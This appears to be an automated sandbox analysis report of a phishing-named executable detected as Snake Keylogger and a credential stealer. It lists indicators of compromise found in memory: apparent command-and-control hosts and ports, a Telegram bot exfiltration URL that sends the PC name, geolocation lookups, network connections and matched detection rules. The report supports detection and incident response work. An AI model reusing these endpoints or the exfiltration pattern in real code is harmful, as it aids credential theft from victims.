Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 20 Nov 2024 08:33:21 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4514730416.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4514730416.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2113939122.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000B.00000002.2160677274.000000000259B000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.0000000000435000.00000040.00000400.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20a
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003250000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: jnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000324B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlBsq
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000314E000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.00000000030DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4514730416.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.00000000030DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003108000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E29000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000314E000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003108000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000327C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lBsq
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002F94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/x

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49767 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 0_2_00EFD51C	0_2_00EFD51C
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 0_2_06C5CF90	0_2_06C5CF90
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 0_2_06C55798	0_2_06C55798
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 0_2_06C57278	0_2_06C57278
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 0_2_06C55360	0_2_06C55360
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 0_2_06C56E40	0_2_06C56E40
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 0_2_06C54F28	0_2_06C54F28
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0125C146	9_2_0125C146
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_01255362	9_2_01255362
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0125D278	9_2_0125D278
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0125C468	9_2_0125C468
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0125C738	9_2_0125C738
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_012569A0	9_2_012569A0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0125E988	9_2_0125E988
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_012529E0	9_2_012529E0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0125CA08	9_2_0125CA08
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0125CCD8	9_2_0125CCD8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0125CFA9	9_2_0125CFA9
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_01256FC8	9_2_01256FC8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_01253E09	9_2_01253E09
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0125F961	9_2_0125F961
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0125E97A	9_2_0125E97A
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05978FB0	9_2_05978FB0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_059781D0	9_2_059781D0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05977B78	9_2_05977B78
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_059715F8	9_2_059715F8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_059715E8	9_2_059715E8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05970D39	9_2_05970D39
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597E538	9_2_0597E538
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597C558	9_2_0597C558
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05970D48	9_2_05970D48
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597E548	9_2_0597E548
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597C548	9_2_0597C548
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05970498	9_2_05970498
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05970489	9_2_05970489
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05976488	9_2_05976488
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597DC19	9_2_0597DC19
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597FC18	9_2_0597FC18
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597BC38	9_2_0597BC38
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597BC2A	9_2_0597BC2A
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597DC28	9_2_0597DC28
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05973450	9_2_05973450
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05976478	9_2_05976478
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05973460	9_2_05973460
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597D798	9_2_0597D798
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597B798	9_2_0597B798
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597D787	9_2_0597D787
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05975780	9_2_05975780
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597F788	9_2_0597F788
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05978FA1	9_2_05978FA1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597B7A8	9_2_0597B7A8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05972FF9	9_2_05972FF9
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05977710	9_2_05977710
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05977720	9_2_05977720
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05972758	9_2_05972758
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05972749	9_2_05972749
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05975770	9_2_05975770
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597F778	9_2_0597F778
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05971E98	9_2_05971E98
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05971EA8	9_2_05971EA8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05974ED0	9_2_05974ED0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05974EC0	9_2_05974EC0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05974610	9_2_05974610
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05974620	9_2_05974620
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597EE57	9_2_0597EE57
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05976E72	9_2_05976E72
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05976E70	9_2_05976E70
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597CE78	9_2_0597CE78
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597CE67	9_2_0597CE67
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597EE68	9_2_0597EE68
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05971190	9_2_05971190
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_059711A0	9_2_059711A0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597E9D8	9_2_0597E9D8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597C9D8	9_2_0597C9D8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597E9C8	9_2_0597E9C8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597C9E8	9_2_0597C9E8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597A938	9_2_0597A938
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597A928	9_2_0597A928
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597C0B7	9_2_0597C0B7
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_059738B8	9_2_059738B8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597E0B8	9_2_0597E0B8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597E0A7	9_2_0597E0A7
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_0597C0C8	9_2_0597C0C8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_059708F0	9_2_059708F0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_059708E0	9_2_059708E0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_05973007	9_2_05973007
